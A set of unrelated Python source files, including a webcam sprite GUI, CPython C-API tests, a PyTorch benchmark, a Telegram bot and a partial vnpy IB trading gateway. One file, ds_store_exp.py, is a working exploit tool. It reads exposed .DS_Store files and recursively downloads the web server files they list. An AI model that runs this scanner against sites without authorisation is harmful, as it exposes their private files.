(x1,y1,w1,h1) = get_face_boundbox(shape, 6)
if set_var == 1:
mvar = random.choice([1,2,3,4])
gvar = random.choice([1,2,3,4])
set_var = 0
if mvar == 1:
apply_sprite(image, "./sprites/moustache.png",w1+50,x1-25,y1+10, incl)
elif mvar == 2:
apply_sprite(image, "./sprites/moustache2.png",w1+65,x1-32,y1+92, incl)
elif mvar == 3:
apply_sprite(image, "./sprites/moustache3.png",w1+60,x1-30,y1+20, incl)
elif mvar == 4:
apply_sprite(image, "./sprites/moustache4.png",w1+110,x1-52,y1+25, incl)
(x3,y3,_,h3) = get_face_boundbox(shape, 1)
if gvar == 1:
apply_sprite(image, "./sprites/glasses1.png",w,x,y3, incl, ontop = False)
elif gvar == 2:
apply_sprite(image, "./sprites/glasses2.png",w,x,y3, incl, ontop = False)
elif gvar == 3:
apply_sprite(image, "./sprites/glasses3.png",w,x,y3, incl, ontop = False)
elif gvar == 4:
apply_sprite(image, "./sprites/glasses4.png",w,x,y3, incl, ontop = False)
# OpenCV represents image as BGR; PIL but RGB, we need to change the chanel order
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# conerts to PIL format
image = Image.fromarray(image)
# Converts to a TK format to visualize it in the GUI
image = ImageTk.PhotoImage(image)
#cv2.imshow('frame',image)
# Actualize the image in the panel to show it
panelA.configure(image=image)
panelA.image = image
video_capture.release()
root = Tk()
root.title("Movember Promo")
this_dir = os.path.dirname(os.path.realpath(__file__))
imgicon = PhotoImage(file=os.path.join(this_dir,'imgs/icon.gif'))
root.tk.call('wm', 'iconphoto', root._w, imgicon)
command = lambda: put_sprite(1)
panelA = Label(root)
panelA.pack( padx=10, pady=10)
SPRITES = [0,1,0,0,0]
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event,))
action.setDaemon(True)
action.start()
def terminate():
global root, run_event, action
print ("Closing thread opencv...")
run_event.clear()
time.sleep(1)
#action.join() #strangely in Linux this thread does not terminate properly, so .join never finishes
root.destroy()
print ("All closed! Ciao")
root.protocol("WM_DELETE_WINDOW", terminate)
root.mainloop() #creates loop of GUI
|
ds_store_exp.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# LiJiejie my[at]lijiejie.com http://www.lijiejie.com
import sys
import urllib2
import cStringIO
import urlparse
import os
import Queue
import threading
from lib.ds_store import DSStore
class Scanner(object):
def __init__(self, start_url):
self.queue = Queue.Queue()
self.queue.put(start_url)
self.processed_url = set()
self.lock = threading.Lock()
self.working_thread = 0
def process(self):
while True:
try:
url = self.queue.get(timeout=2.0)
self.lock.acquire()
self.working_thread += 1
self.lock.release()
except Exception, e:
if self.working_thread == 0:
break
else:
continue
try:
if url in self.processed_url:
pass
else:
self.processed_url.add(url)
base_url = url.rstrip('.DS_Store')
if not url.lower().startswith('http'):
url = 'http://%s' % url
schema, netloc, path, _, _, _ = urlparse.urlparse(url, 'http')
try:
response = urllib2.urlopen(url)
except Exception, e:
if str(e) == 'HTTP Error 403: Forbidden':
self.lock.acquire()
print '[Folder Found] %s' % url
self.lock.release()
continue
data = response.read()
if response.code == 200:
folder_name = netloc.replace(':', '_') + '/'.join(path.split('/')[:-1])
if not os.path.exists(folder_name):
os.makedirs(folder_name)
with open(netloc.replace(':', '_') + path, 'wb') as outFile:
self.lock.acquire()
print '[+] %s' % url
self.lock.release()
outFile.write(data)
if url.endswith('.DS_Store'):
ds_store_file = cStringIO.StringIO()
ds_store_file.write(data)
d = DSStore.open(ds_store_file)
dirs_files = set()
for x in d.traverse():
dirs_files.add(x.filename)
for name in dirs_files:
if name != '.':
self.queue.put(base_url + name)
self.queue.put(base_url + name + '/.DS_Store')
d.close()
except:
pass
finally:
self.working_thread -= 1
def scan(self):
all_threads = []
for i in range(10):
t = threading.Thread(target=self.process)
all_threads.append(t)
t.start()
if __name__ == '__main__':
if len(sys.argv) == 1:
print 'A .DS_Store file disclosure exploit. By LiJieJie'
print
print 'It parse .DS_Store and download file recursively.'
print
print ' Usage: python ds_store_exp.py http://www.example.com/.DS_Store'
sys.exit(0)
s = Scanner(sys.argv[1])
s.scan()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import os
import pickle
import random
import subprocess
import sys
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
import _testcapi
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, "")
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature (boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "(sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"This docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"(parameter)")
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
basepath = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Modules")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out.decode("latin1"), err.decode("latin1")
def test_subinterps(self):
# This is just a "don't crash" test
out, err = self.run_embedded_interpreter()
if support.verbose:
print()
print(out)
print(err)
@staticmethod
def _get_default_pipe_encoding():
rp, wp = os.pipe()
try:
with os.fdopen(wp, 'w') as w:
default_pipe_encoding = w.encoding
finally:
os.close(rp)
return default_pipe_encoding
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
out, err = self.run_embedded_interpreter("forced_io_encoding")
if support.verbose:
print()
print(out)
print(err)
expected_stdin_encoding = sys.__stdin__.encoding
expected_pipe_encoding = self._get_default_pipe_encoding()
expected_output = os.linesep.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {0}:strict",
"stdout: {1}:strict",
"stderr: {1}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: surrogateescape",
"stdin: {0}:surrogateescape",
"stdout: {1}:surrogateescape",
"stderr: {1}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:strict",
"stdout: latin-1:strict",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: surrogateescape",
"stdin: latin-1:surrogateescape",
"stdout: latin-1:surrogateescape",
"stderr: latin-1:backslashreplace"]).format(expected_stdin_encoding,
expected_pipe_encoding)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accomodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
# (note: the format string must be bytes!)
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format.encode("ascii"), keywords)
when_not_skipped = False
except TypeError as e:
s = "argument 1 must be impossible<bad format char>, not int"
when_not_skipped = (str(e) == s)
except RuntimeError as e:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format.encode("ascii"), keywords)
when_skipped = False
except RuntimeError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# parse_tuple_and_keywords error handling tests
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [42])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
with self.subTest("internal", name=name):
test = getattr(_testcapi, name)
test()
if __name__ == "__main__":
unittest.main()
|
802_pytorch_nnBenchmark_threadNumAndMultiProcess.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 5 20:01:56 2019
@author: yangyutu123
"""
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.multiprocessing import Process
from termcolor import colored as clr
class TestNet(nn.Module):
""" Net for low-dimensional games.
"""
def __init__(self, input_channels, hist_len, action_no):
self.in_channels = hist_len * input_channels
super(TestNet, self).__init__()
self.conv1 = nn.Conv2d(self.in_channels, 32, kernel_size=5,
stride=2, padding=1)
self.conv2 = nn.Conv2d(32, 32, kernel_size=5, stride=2)
self.lin1 = nn.Linear(512, 32)
self.head = nn.Linear(32, action_no)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.lin1(x.view(x.size(0), -1)))
return self.head(x.view(x.size(0), -1))
def play(steps, model, allocate_on_cpu=False):
state = torch.rand(1, 1, 24, 24)
batch = torch.rand(5, 1, 24, 24)
model(state).data.max(1)[1]
model.zero_grad()
y = model(batch).max(1)[0]
t = torch.randn(y.size())
loss = F.smooth_l1_loss(y, t)
loss.backward()
def work_unit(pidx, steps, model):
# this line is critical !!!!, if not set, there will be multithread in each indivial process, will greatly reduce speed.
torch.set_num_threads(1)
print("[worker #%d] started." % pidx)
print("[worker #%d] has %d threads." % (pidx, torch.get_num_threads()))
for i in range(steps):
play(steps, model)
print("[worker #%d] finished." % pidx)
if __name__ == "__main__":
torch.manual_seed(42)
torch.set_num_threads(1)
torch.set_default_tensor_type("torch.FloatTensor")
steps = 30000
j = 8
print(clr("Benchmark settings:", 'green'))
print("No of threads available: %d" % torch.get_num_threads())
print(clr("No of 'game steps': %d" % steps))
print(clr("No of agents (processes): %d" % j))
model = TestNet(1, 1, 3).share_memory()
p_steps = int(steps / j)
processes = [Process(target=work_unit, args=(p, p_steps, model))
for p in range(j)]
start = time.time()
for p in processes:
p.start()
for p in processes:
p.join()
print(clr("Time: %.3f seconds." % (time.time() - start), 'green'))
|
iCopy.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os, sys, logging
from telegram import Bot
from telegram.utils.request import Request as TGRequest
from utils import load
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackQueryHandler,
ConversationHandler,
)
from utils import (
get_set as _set,
get_functions as _func,
task_box as _box,
task_payload as _payload,
callback_stage as _stage,
__version__,
)
from workflow import (
start_workflow as _start,
quick_workflow as _quick,
copy_workflow as _copy,
size_workflow as _size,
regex_workflow as _regex,
purge_workflow as _purge,
dedupe_workflow as _dedupe,
)
from multiprocessing import Process as _mp, Manager
from threading import Thread
from utils.load import ns
from web import dash
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
# ############################### Main ####################################
def main():
### bot define
request = TGRequest(con_pool_size=8)
bot = Bot(token=f"{load.cfg['tg']['token']}", request=request)
updater = Updater(bot=bot, use_context=True)
### judge is restart
is_restart = load.db_counters.find_one({"_id": "is_restart"})
if is_restart is not None:
if is_restart["status"] == 0:
pass
else:
_func.check_restart(bot)
else:
load.db_counters.update(
{"_id": "is_restart"}, {"status": 0}, upsert=True,
)
dp = updater.dispatcher
# Entry Conversation
conv_handler = ConversationHandler(
entry_points=[
# Entry Points
CommandHandler("set", _set._setting),
CommandHandler("menu", _start.menu),
CommandHandler("quick", _quick.quick),
CommandHandler("copy", _copy.copy),
CommandHandler("task", _box.taskinfo),
CommandHandler("size", _size.size),
CommandHandler("purge", _purge.purge),
CommandHandler("dedupe", _dedupe.dedupe),
MessageHandler(
Filters.regex(pattern=load.regex_entry_pattern), _regex.regex_entry
),
],
states={
_stage.SET_FAV_MULTI: [
# fav settings function
MessageHandler(Filters.text, _set._multi_settings_recieved),
],
_stage.CHOOSE_MODE: [
# call function judged via callback pattern
CallbackQueryHandler(_quick.quick, pattern="quick"),
CallbackQueryHandler(_copy.copy, pattern="copy"),
],
_stage.GET_LINK: [
# get Shared_Link states
MessageHandler(Filters.text, _func.get_share_link),
],
_stage.IS_COVER_QUICK: [
# cover quick setting
CallbackQueryHandler(_func.modify_quick_in_db, pattern="cover_quick"),
CallbackQueryHandler(_func.cancel, pattern="not_cover_quick"),
MessageHandler(Filters.text, _func.cancel),
],
_stage.GET_DST: [
# request DST
CallbackQueryHandler(_copy.request_srcinfo),
],
_stage.COOK_ID: [
# request to COOK ID
MessageHandler(Filters.text, _size.size_handle),
],
_stage.REGEX_IN: [
# regex in choose mode
CallbackQueryHandler(_regex.regex_callback, pattern=r"quick|copy|size"),
],
_stage.REGEX_GET_DST: [
# regex copy end
CallbackQueryHandler(_regex.regex_copy_end),
],
_stage.COOK_FAV_TO_SIZE: [CallbackQueryHandler(_size.pre_cook_fav_to_size),],
_stage.COOK_FAV_PURGE: [CallbackQueryHandler(_purge.pre_to_purge),],
_stage.COOK_ID_DEDU: [CallbackQueryHandler(_dedupe.dedupe_mode),],
_stage.COOK_FAV_DEDU: [CallbackQueryHandler(_dedupe.dedupe_fav_mode),],
_stage.FAV_PRE_DEDU_INFO: [CallbackQueryHandler(_dedupe.pre_favdedu_info)],
_stage.SET_WEB: [MessageHandler(Filters.text, _set.setWeb),],
},
fallbacks=[CommandHandler("cancel", _func.cancel)],
)
def stop_and_restart():
progress.terminate()
load.myclient.close()
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(update, context):
restart_msg = update.message.reply_text(load._text[load._lang]["is_restarting"])
restart_chat_id = restart_msg.chat_id
restart_msg_id = restart_msg.message_id
load.db_counters.update_one(
{"_id": "is_restart"},
{
"$set": {
"status": 1,
"chat_id": restart_chat_id,
"message_id": restart_msg_id,
}
},
True,
)
Thread(target=stop_and_restart).start()
dp.add_handler(conv_handler)
dp.add_handler(CommandHandler("start", _start.start))
dp.add_handler(CommandHandler("reset", _box.task_reset))
dp.add_handler(CommandHandler("kill", _func.taskill))
dp.add_handler(CommandHandler("ver", _func._version))
dp.add_handler(
CommandHandler(
"restart",
restart,
filters=Filters.user(user_id=int(load.cfg["tg"]["usr_id"])),
)
)
dp.add_error_handler(_func.error)
updater.start_polling()
logger.info("Fxxkr LAB iCopy " + __version__.__version__ + " Start")
updater.idle()
if __name__ == "__main__":
ns.x = 0
progress = _mp(target=_payload.task_buffer, args=(ns,))
progress.start()
if load.cfg['web']['dashboard']:
web = _mp(target=dash.dashboard)
web.start()
main()
|
ib_gateway.py
|
"""
IB Symbol Rules
SPY-USD-STK SMART
EUR-USD-CASH IDEALPRO
XAUUSD-USD-CMDTY SMART
ES-202002-USD-FUT GLOBEX
SI-202006-1000-USD-FUT NYMEX
ES-2020006-C-2430-50-USD-FOP GLOBEX
"""
from copy import copy
from datetime import datetime, timedelta
from threading import Thread, Condition
from typing import Optional, Dict, Any, List
import shelve
from pytz import BaseTzInfo
from tzlocal import get_localzone
from vnpy.event import EventEngine
from ibapi.client import EClient
from ibapi.common import OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType, TickTypeEnum
from ibapi.wrapper import EWrapper
from ibapi.common import BarData as IbBarData
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
BarData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
Interval
)
from vnpy.trader.utility import get_file_path
from vnpy.trader.event import EVENT_TIMER
from vnpy.event import Event
# 委托状态映射
STATUS_IB2VT: Dict[str, Status] = {
"ApiPending": Status.SUBMITTING,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
"Submitted": Status.NOTTRADED,
"ApiCancelled": Status.CANCELLED,
"Cancelled": Status.CANCELLED,
"Filled": Status.ALLTRADED,
"Inactive": Status.REJECTED,
}
# 多空方向映射
DIRECTION_VT2IB: Dict[Direction, str] = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT: Dict[str, Direction] = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
# 委托类型映射
ORDERTYPE_VT2IB: Dict[OrderType, str] = {
OrderType.LIMIT: "LMT",
OrderType.MARKET: "MKT",
OrderType.STOP: "STP"
}
ORDERTYPE_IB2VT: Dict[str, OrderType] = {v: k for k, v in ORDERTYPE_VT2IB.items()}
# 交易所映射
EXCHANGE_VT2IB: Dict[Exchange, str] = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
Exchange.CFE: "CFE",
Exchange.NYSE: "NYSE",
Exchange.NASDAQ: "NASDAQ",
Exchange.ARCA: "ARCA",
Exchange.EDGEA: "EDGEA",
Exchange.ISLAND: "ISLAND",
Exchange.BATS: "BATS",
Exchange.IEX: "IEX",
Exchange.IBKRATS: "IBKRATS",
Exchange.OTC: "PINK",
Exchange.SGX: "SGX"
}
EXCHANGE_IB2VT: Dict[str, Exchange] = {v: k for k, v in EXCHANGE_VT2IB.items()}
# 产品类型映射
PRODUCT_IB2VT: Dict[str, Product] = {
"STK": Product.EQUITY,
"CASH": Product.FOREX,
"CMDTY": Product.SPOT,
"FUT": Product.FUTURES,
"OPT": Product.OPTION,
"FOP": Product.OPTION,
"CONTFUT": Product.FUTURES
}
# 期权类型映射
OPTION_VT2IB: Dict[str, OptionType] = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
# 货币类型映射
CURRENCY_VT2IB: Dict[Currency, str] = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
# 切片数据字段映射
TICKFIELD_IB2VT: Dict[int, str] = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
# 账户类型映射
ACCOUNTFIELD_IB2VT: Dict[str, str] = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
# 数据频率映射
INTERVAL_VT2IB: Dict[Interval, str] = {
Interval.MINUTE: "1 min",
Interval.HOUR: "1 hour",
Interval.DAILY: "1 day",
}
# 其他常量
JOIN_SYMBOL: str = "-"
class IbGateway(BaseGateway):
"""
vn.py用于对接IB的交易接口。
"""
default_setting: Dict[str, Any] = {
"TWS地址": "127.0.0.1",
"TWS端口": 7497,
"客户号": 1,
"交易账户": ""
}
exchanges: List[str] = list(EXCHANGE_VT2IB.keys())
def __init__(self, event_engine: EventEngine, gateway_name: str = "IB") -> None:
"""构造函数"""
super().__init__(event_engine, gateway_name)
self.api: "IbApi" = IbApi(self)
self.count: int = 0
def connect(self, setting: dict) -> None:
"""连接交易接口"""
host: str = setting["TWS地址"]
port: int = setting["TWS端口"]
clientid: int = setting["客户号"]
account: str = setting["交易账户"]
self.api.connect(host, port, clientid, account)
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def close(self) -> None:
"""关闭接口"""
self.api.close()
def subscribe(self, req: SubscribeRequest) -> None:
"""订阅行情"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest) -> str:
"""委托下单"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest) -> None:
"""委托撤单"""
self.api.cancel_order(req)
def query_account(self) -> None:
"""查询资金"""
pass
def query_position(self) -> None:
"""查询持仓"""
pass
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""查询历史数据"""
return self.api.query_history(req)
def process_timer_event(self, event: Event) -> None:
"""定时事件处理"""
self.count += 1
if self.count < 10:
return
self.count = 0
self.api.check_connection()
class IbApi(EWrapper):
"""IB的API接口"""
data_filename: str = "ib_contract_data.db"
data_filepath: str = str(get_file_path(data_filename))
local_tz: BaseTzInfo = get_localzone()
def __init__(self, gateway: IbGateway) -> None:
"""构造函数"""
super().__init__()
self.gateway: IbGateway = gateway
self.gateway_name: str = gateway.gateway_name
self.status: bool = False
self.reqid: int = 0
self.orderid: int = 0
self.clientid: int = 0
self.history_reqid: int = 0
self.account: str = ""
self.ticks: Dict[int, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.tick_exchange: Dict[int, Exchange] = {}
self.subscribed: Dict[str, SubscribeRequest] = {}
self.data_ready: bool = False
self.history_req: HistoryRequest = None
self.history_condition: Condition = Condition()
self.history_buf: List[BarData] = []
self.client: EClient = EClient(self)
def connectAck(self) -> None:
"""连接成功回报"""
self.status = True
self.gateway.write_log("IB TWS连接成功")
self.load_contract_data()
self.data_ready = False
def connectionClosed(self) -> None:
"""连接断开回报"""
self.status = False
self.gateway.write_log("IB TWS连接断开")
def nextValidId(self, orderId: int) -> None:
"""下一个有效订单号回报"""
super().nextValidId(orderId)
if not self.orderid:
self.orderid = orderId
